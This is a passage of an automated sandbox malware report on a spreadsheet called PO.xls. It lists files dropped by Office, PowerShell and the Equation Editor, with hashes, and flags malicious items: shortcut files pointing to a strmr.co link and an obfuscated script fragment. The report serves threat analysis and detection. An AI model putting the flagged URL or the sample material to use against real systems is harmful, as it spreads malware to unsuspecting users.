                                                                                                      SSDEEP:384:PcPg6mXSEFPb6IXSEmPb6FeDXSEmP16TXSEzPb6TXSE:iSU05FeTbjaj
                                                                                                      MD5:FC475C2E6F55A4BFE5AD85DD8F5C29E7
                                                                                                      SHA1:911C59C3A3DA4236BF893E5E049A268BEDC0A7C2
                                                                                                      SHA-256:3979C82BADAF612780196D093229210B01CA208AA9065942054C6D6F13A8D4EE
                                                                                                      SHA-512:8D206FC26E21F4ED0F3C01BF9AE4AFCDDFE6A42C0979801D80B2342F9A42953D1B027C0ED9BB619CDC2F39F85D29A291201E25284C76BF4F8D008AC7CD400868
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1024
                                                                                                      Entropy (8bit):0.05390218305374581
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:ol3lYdn:4Wn
                                                                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                      Malicious:false
                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):9728
                                                                                                      Entropy (8bit):3.586819497834099
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:Kj3iXpHVmZveWqKlOu39NBN3aIt+Ho+Qi04i8x5crqJN0EXZ06qQ2bA7t:E3i7w/qK0I9R3aItuA4iVrqJN0EXZ3qk
                                                                                                      MD5:8FF9B4B44550382B1199BA06A8275CA9
                                                                                                      SHA1:6351CC128FD4949E59D778C3B6D8068AFFA11C37
                                                                                                      SHA-256:FF4B3CC9CF93BA352134F290550F2F847AAAB31FD0ECB680AD3FD320B4BA514C
                                                                                                      SHA-512:7E5771B1EE3FFBE2F0C50C52898C349821592C393896B3AA89E5CE2A01AD9287550EDB368D2EADFC9F0BCD9CDF0FB39F173218C6B12E33182AD31125CB086179
                                                                                                      Malicious:false
                                                                                                      Preview:0.8.6.2.5.1.9.3.@.3...?.].(...2.!.-.?.~.).|.2.?.*.<.?.:...7.2.#.?.`.~.0.0.5.=._.?.1.=.;.?.`.1.1.9.%.*.?...1.^.=.+.%.).-.:...).~.9.!.>.~.(.^.@.~.5.[.?.-.<.?.7.3._.~.+...$.%.;.#.@.@.1...?.~.%.8...&.^.&.`.`...../.#.?.?.@.6.7...!.|.5.?...4.-.6.-.3.:.8.?.&.5.'.^.8._.'.?.(.!./.?.'...|.!.;.&.2.~.`.4...%.<.?._./.-...+.5.....0.9.2.>.|.|.:.-.*.?.?.$.<.?.%.&.....0.'./...%.`...@...4.?.=.0.?.).4...*.6.,.#.%.6.>.?.?.?...,.<.9.?.'.....].+._.1.7.?./.5.%.3.?.(.?.%.=.8.:.].[.|.'.6...<.#...5.;.:.).?.5.5./...#.@.8.).|.|.!.?.^.....:.?.?.0...[.?.>.&.~.0.,.1.%.*.-.5...%./.?.4.$.|.0.-.].5._.>.].9.?.?.-.<.^...].|.$.[.<.?...&.<.`.?.>.%.$...(.=.>.'._.].3.?.?.?...,.0.~...'.1.?.6.[.*.5.&.8.2.?.~.^.:.?.@.5.>.<.>.4.;.?.%...%.3.?.7.+.>.4.|.(.`.%.6.$.0.@.|.?.;.+._.*.9.).,._.=...|.,.,.>.(.&.#.<.(.0.].@.<.|.0.?.>.'.[.*.).%.(.=.?.;.5.~.%.>.].(.*.'.6./.?./.?.4.-.!.,.;.?.?...3.=.6...6.2.,.?.5.:.?.?.`.?.1._...9.3.3.!...].*.[.?.?.+.2.=.|.[.'.;.?.'.?.[.*.?.*.,.4.3.3.?.@.(.:.2.|.[.]...(.'.3.+.+.5.#.>.1.^./.=.2.[.-.[.#.&.4./.7.
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:very short file (no magic)
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1
                                                                                                      Entropy (8bit):0.0
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:U:U
                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                      Malicious:false
                                                                                                      Preview:1
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:very short file (no magic)
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1
                                                                                                      Entropy (8bit):0.0
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:U:U
                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                      Malicious:false
                                                                                                      Preview:1
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:very short file (no magic)
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1
                                                                                                      Entropy (8bit):0.0
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:U:U
                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                      Malicious:false
                                                                                                      Preview:1
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:very short file (no magic)
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1
                                                                                                      Entropy (8bit):0.0
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:U:U
                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                      Malicious:false
                                                                                                      Preview:1
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):131072
                                                                                                      Entropy (8bit):0.025480960723298182
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:I3DPcdNvxggLRbpHtr1YFRXv//4tfnRujlw//+GtluJ/eRuj:I3DPEBjr1uvYg3J/
                                                                                                      MD5:9E9B0D079437F4F8167DDADD8B39496B
                                                                                                      SHA1:2B529969BA99DA2CF85843BAEE75FF7D53A46D7C
                                                                                                      SHA-256:0766CD1B9791E8CA4DED026ACADE2BBFA29AECB279D8C0299AA663BE821C5D4F
                                                                                                      SHA-512:75A93F0A95B5BBE7CE9C435B50AC45CA2916AC1070F0610C271449686B1EF6BA6DE4937E85B280CF59648A7419B3DE5E7CACA692F9444473D74B7DB066DF2A00
                                                                                                      Malicious:false
                                                                                                      Preview:......M.eFy...zM.x'1..A.....'wVS,...X.F...Fa.q...................................K.k.. =...........U...@.A.~4.b.q......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):131072
                                                                                                      Entropy (8bit):0.025361166851056896
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:I3DPcU3djHvxggLRSjkm3rRXv//4tfnRujlw//+GtluJ/eRuj:I3DPT4X3tvYg3J/
                                                                                                      MD5:B67A0CD7BAF53E71776D0DE71B2FD003
                                                                                                      SHA1:26AA47FFD54707E6F8D7E08CFA0F5C1FFBBFB86E
                                                                                                      SHA-256:97C991C620C58AB38A883A999293E4F827EFBFB07882DD786177D145D52EB80D
                                                                                                      SHA-512:DEC423C9B465C099F89DDA3E2F3C1AF771DB3002C9410569749A2E24E8017ADAA4D29ACD5EE6325D72AD1359472AC10BEDFA95A13295583D6C5E649E68CAFB0F
                                                                                                      Malicious:false
                                                                                                      Preview:......M.eFy...z.j.{...D...%K...S,...X.F...Fa.q............................A.....I....$............e...X.F.k..n.>......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):339968
                                                                                                      Entropy (8bit):7.769372701407828
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:hTXU+xUOA8HH6InGM7HRgNbnFto8++wXbgcl0WDL4yQfL6fkAv5W:hT5UOAsHFnd7HeT/o8gg8Rsfe8sW
                                                                                                      MD5:8E0859453D2EB9035369BF54B34CEF85
                                                                                                      SHA1:3E561BC65EF3651CA35B37B86D85D2AD6C01EF73
                                                                                                      SHA-256:09F136F83A338CF4D5F1F94ACC24AD7E11D5D964C92B22168B4BB386A97DD17F
                                                                                                      SHA-512:B8EADE4F09A082205B8C2862F74B80D2E0B16D36A738020E4B14326690DC3CA128E9679EF2DDB3C945B1F8EBCB1A215E6C38A7C19191364D748EF4568A8CC1FE
                                                                                                      Malicious:false
                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):512
                                                                                                      Entropy (8bit):0.0
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3::
                                                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                      Malicious:false
                                                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                      Category:dropped
                                                                                                      Size (bytes):333824
                                                                                                      Entropy (8bit):7.884316157855682
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:RTXU+xUOA8HH6InGM7HRgNbnFto8++wXbgcl0WDL4yQfL6fkAv5W:RT5UOAsHFnd7HeT/o8gg8Rsfe8sW
                                                                                                      MD5:543ED1B9E0FD933A2426847EF1594355
                                                                                                      SHA1:BC590CBC3784B802DFD009F6CAC49575BF8C6A21
                                                                                                      SHA-256:9919B84E6558D3D26018ACCAAA8233E8028DFB89F3B193E90315931C25BD9939
                                                                                                      SHA-512:B8A8DFA3F421C8569D969EE5100503E463B01952C70AA759B23D2E4478E4A3D49DCCA31F47112B27E208A0699F8763619BCB6B269BC9256E441F27C29A636A76
                                                                                                      Malicious:false
                                                                                                      Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):512
                                                                                                      Entropy (8bit):0.0
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3::
                                                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                      Malicious:false
                                                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                      File Type:MS Windows 95 Internet shortcut text (URL=<https://strmr.co/a9ifFT>), ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):49
                                                                                                      Entropy (8bit):4.62682470214446
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:HRAbABGQYm2fk6Z00ovn:HRYFVm4kbJ
                                                                                                      MD5:FD0188D534F8569CE8E480FD6FE20B61
                                                                                                      SHA1:FCF4C48F3ACD4D3C06CC77CF0FC036F3D628B693
                                                                                                      SHA-256:07FDB15852BF5D93A4FFFC256031BC03DCCE3F55370DDA6E3DDA054794A62F8C
                                                                                                      SHA-512:D9EEE8C4B19A81BE40FA2862AAC01750619F1C5080A2E867B17E88D8ACE6D522EB1FAF32EE71BCD5FDC8EF26EB1C083A7433225B5A269F6A2259DCA44647322C
                                                                                                      Malicious:true
                                                                                                      Preview:[InternetShortcut]..URL=https://strmr.co/a9ifFT..
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                      File Type:Generic INItialization configuration [xls]
                                                                                                      Category:modified
                                                                                                      Size (bytes):68
                                                                                                      Entropy (8bit):4.572849334490178
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:bDoKYh6ZW4dd6YCmMXYCv:bkV644dd6YUXYs
                                                                                                      MD5:AE64185D02A472ACAA75038ADF8FA595
                                                                                                      SHA1:2A42CB63BD0857954D9B9B1FEF8B7A815CF1DBBE
                                                                                                      SHA-256:0453192C0F27FC5FDFBAC2E671D6006B855F5FB9A2D5820D706B0B825DC319D4
                                                                                                      SHA-512:FC2D366AB5BA0F4551CD102229C2B4FB1C29BE7590A3CAEDB593E902E131B301AD79A8DB580663F8DB5EA0149DE7295542666019377D356BF474B0616D09D152
                                                                                                      Malicious:false
                                                                                                      Preview:[folders]..a9ifFT.url=0..strmr.co.url=0..PO.LNK=0..[xls]..PO.LNK=0..
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                      File Type:MS Windows 95 Internet shortcut text (URL=<https://strmr.co/>), ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):43
                                                                                                      Entropy (8bit):4.300535174316826
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:HRAbABGQYm2fk6ZD:HRYFVm4kE
                                                                                                      MD5:6B0CC25F2A1C5022663F9504B1978D43
                                                                                                      SHA1:524A2AE756F4DB590A6F3981312C936F8B64B6D2
                                                                                                      SHA-256:462CADC2A9625BB09682AAC27CD23FA484AE4638805E1ED16F0B82DDCD58EEB7
                                                                                                      SHA-512:7DF469932CF64B9A65EE01878C68F16E56C4C1514D1A449754C73D5F840A0556CC7D2CE521F8444F0314B708C8EF3111C88AE272479077D7F341DA96DBFEAF13
                                                                                                      Malicious:true
                                                                                                      Preview:[InternetShortcut]..URL=https://strmr.co/..
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):162
                                                                                                      Entropy (8bit):2.503835550707525
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:vrJlaCkWtVypil69oycWjUbtFJlln:vdsCkWtTl69oyjUvl
                                                                                                      MD5:CB3D0F9D3F7204AF5670A294AB575B37
                                                                                                      SHA1:5E792DFBAD5EDA9305FCF8F671F385130BB967D8
                                                                                                      SHA-256:45968B9F50A9B4183FBF4987A106AB52EB3EF3279B2118F9AB01BA837DC3968A
                                                                                                      SHA-512:BD116CAF3ACA40A5B90168A022C84923DB51630FA0E62E46020B71B8EB9613EAE776D476B0C6DE0D5F15642A74ED857765150F406937FBA5CB995E9FCDAC81AE
                                                                                                      Malicious:false
                                                                                                      Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):287788
                                                                                                      Entropy (8bit):3.7504621377581446
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:B67qps7ACJHiVKcfGDFrAjG/1e5iXS3VgIOn1SMTXAPwNox:uqps7ACIhUFUjG/qii3Vgfn1SMMPVx
                                                                                                      MD5:9AD8FFC121555E095C50E055C94F5C1E
                                                                                                      SHA1:880257375B655F27C6CB156BC295574BBDA06130
                                                                                                      SHA-256:D96A7A5F278ECED0B23141D34A5A8A465D88085D4E0007D201EFB6C1F2DE34B0
                                                                                                      SHA-512:D9C6ABDD4F3239E4099791BE19721500214A38ED4665FF81D97865AFCA18D0E79DE1C0734DC31790A0BF051880C7F7B563AC171EE624CDD1F90B2B44C018D448
                                                                                                      Malicious:true
                                                                                                      Preview:..Z.z.v.l.L.G.T.W.W.t.G.k.L.L.a.L.R.l.i.W.O.I.b.c.s.J.W.H.c.U.z. .=. .".s.t.f.U.A.t.W.J.k.C.K.n.U.L.R.R.A.z.W.i.W.z.h.R.L.x.S.G.N.K.K.".....U.T.h.C.a.b.a.l.a.d.o.B.K.L.i.m.h.z.e.h.z.j.L.i.B.c.G.b.i.G.c.b.L.Z.P.L. .=. .".p.k.U.i.l.c.x.a.K.n.R.o.h.n.K.k.B.L.L.K.W.L.L.U.t.a.A.n.W.n.B.".....o.m.N.B.k.C.m.i.p.Z.n.h.l.m.g.b.d.a.B.A.e.L.j.G.z.Z.v.U.c.K.i. .=. .".W.R.a.k.L.U.p.K.Z.R.K.I.e.c.i.U.l.o.L.b.g.G.U.c.i.H.d.p.b.j.Z.".....C.L.c.p.m.d.x.g.P.c.L.W.P.P.i.K.K.A.o.I.S.j.P.t.L.q.x.L.K.f.l. .=. .".v.L.c.A.t.L.W.W.C.C.j.f.n.p.Z.N.q.K.G.d.R.L.A.z.i.P.A.i.x.W.L.".....q.L.W.U.A.k.N.A.b.G.e.G.b.u.c.u.b.o.f.c.U.e.K.h.L.i.x.e.K.W.b. .=. .".c.b.z.p.U.z.A.z.W.d.v.x.K.s.a.i.U.q.b.k.T.O.W.f.q.G.o.z.k.x.f.".....G.l.G.K.c.m.x.W.a.R.K.B.G.W.L.L.x.b.s.N.k.x.L.B.u.U.Q.c.u.t.b. .=. .".j.t.p.h.m.e.b.P.J.x.I.f.C.P.f.k.Z.A.G.h.C.O.W.x.i.G.c.c.W.x.d.".....s.P.A.o.U.z.l.c.N.P.r.L.W.c.H.f.n.W.z.e.Z.K.U.W.l.i.U.h.b.P.m. .=. .".l.i.c.L.R.c.R.U.x.L.d.W.m.P.k.a.W.p.G.i.L.K.W.L.W.p.a.k.i.b.Q.".....b.W.i.H.W.W.N.G.W.m.k.
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Sep 27 11:52:06 2024, Security: 1
                                                                                                      Category:dropped
                                                                                                      Size (bytes):726528
                                                                                                      Entropy (8bit):7.977304346981028
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:BT5UOAsHFnd7HeT/o8gg8Rsfe8sWAH6+BkLp8KWBeUXVjkbcgTDOk3apxXjeVF:1LpsAbg8R6AH1BkyK2DFjXgfr34peVF
                                                                                                      MD5:F24C0FDC98F2402433C596D74348EECE
                                                                                                      SHA1:D97BC6C096FCB9DCC9F879D683313F8C3161C0C6
                                                                                                      SHA-256:43FEF6721D750CE7937D1F9027A7EC768996C77CEA9BF8C3A95F0FC0C1B9592E
                                                                                                      SHA-512:C37A55FFBD837E0614CB8F4859E174B8869883B4D3B24747D7C8E334D12C62043CAE055D3C51153EB7C221E883A9B395F9D105FCAC9AA82479A6EB169D814A72
                                                                                                      Malicious:false
                                                                                                      Preview:......................>...................................w...................................y.......{.......}........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):26
                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                      Malicious:false
                                                                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Sep 27 11:52:06 2024, Security: 1
                                                                                                      Category:dropped
                                                                                                      Size (bytes):726528
                                                                                                      Entropy (8bit):7.977304346981028
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:BT5UOAsHFnd7HeT/o8gg8Rsfe8sWAH6+BkLp8KWBeUXVjkbcgTDOk3apxXjeVF:1LpsAbg8R6AH1BkyK2DFjXgfr34peVF
                                                                                                      MD5:F24C0FDC98F2402433C596D74348EECE
                                                                                                      SHA1:D97BC6C096FCB9DCC9F879D683313F8C3161C0C6
                                                                                                      SHA-256:43FEF6721D750CE7937D1F9027A7EC768996C77CEA9BF8C3A95F0FC0C1B9592E
                                                                                                      SHA-512:C37A55FFBD837E0614CB8F4859E174B8869883B4D3B24747D7C8E334D12C62043CAE055D3C51153EB7C221E883A9B395F9D105FCAC9AA82479A6EB169D814A72
                                                                                                      Malicious:true
                                                                                                      Preview:......................>...................................w...................................y.......{.......}........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Sep 27 10:09:48 2024, Security: 1
                                                                                                      Entropy (8bit):7.967559875681491
                                                                                                      TrID:
                                                                                                      • Microsoft Excel sheet (30009/1) 47.99%
                                                                                                      • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                                                      File name:PO.xls
                                                                                                      File size:723'456 bytes
                                                                                                      MD5:aceb61a7c1ea841efa668c8a5b3427d7
                                                                                                      SHA1:af4fb51f1094df5ef6cea47ee227dc4f6f7c20bf
                                                                                                      SHA256:1aa355143beeb4fdf79de0c7f79560cf62f10a394cb15d41f5fe7f8672ba8f98
                                                                                                      SHA512:c438ccdf87c10567b286dc5af88409fccd70388eb0df399e0324a797956fddf430c1c67880bb9d5e7472195228b3729e3ce45514200c417dc6fccb79398ea9bd
                                                                                                      SSDEEP:12288:L+UOAsHFnd7HeT/o8gg8Rsfe8GGNPKTs3+9PcEqI2mt07ll829urVLXwL0WDvRFv:LepsAbg8RN5s3+LbqZC2YcJF2
                                                                                                      TLSH:4FF4121BBA85C262C0E6DA7D55C4C09201AEFD4A9FE6AE033A4577FC3D3E231574688D
                                                                                                      File Content Preview:........................>...............................................................................c.......e..............................................................................................................................................
                                                                                                      Icon Hash:276ea3a6a6b7bfbf
                                                                                                      Document Type:OLE
                                                                                                      Number of OLE Files:1
                                                                                                      Has Summary Info:
                                                                                                      Application Name:Microsoft Excel
                                                                                                      Encrypted Document:True
                                                                                                      Contains Word Document Stream:False
                                                                                                      Contains Workbook/Book Stream:True
                                                                                                      Contains PowerPoint Document Stream:False
                                                                                                      Contains Visio Document Stream:False
                                                                                                      Contains ObjectPool Stream:False
                                                                                                      Flash Objects Count:0
                                                                                                      Contains VBA Macros:True
                                                                                                      Code Page:1252
                                                                                                      Author:
                                                                                                      Last Saved By:
                                                                                                      Create Time:2006-09-16 00:00:00
                                                                                                      Last Saved Time:2024-09-27 09:09:48
                                                                                                      Creating Application:Microsoft Excel
                                                                                                      Security:1
                                                                                                      Document Code Page:1252
                                                                                                      Thumbnail Scaling Desired:False
                                                                                                      Contains Dirty Links:False
                                                                                                      Shared Document:False
                                                                                                      Changed Hyperlinks:False
                                                                                                      Application Version:786432
                                                                                                      General
                                                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                                                      VBA File Name:Sheet1.cls
                                                                                                      Stream Size:977
                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . t * ' . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 74 98 2a 27 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                      Attribute VB_Name = "Sheet1"
                                                                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                      Attribute VB_GlobalNameSpace = False
                                                                                                      Attribute VB_Creatable = False
                                                                                                      Attribute VB_PredeclaredId = True
                                                                                                      Attribute VB_Exposed = True
                                                                                                      Attribute VB_TemplateDerived = False
                                                                                                      Attribute VB_Customizable = True
                                                                                                      

                                                                                                      General
                                                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
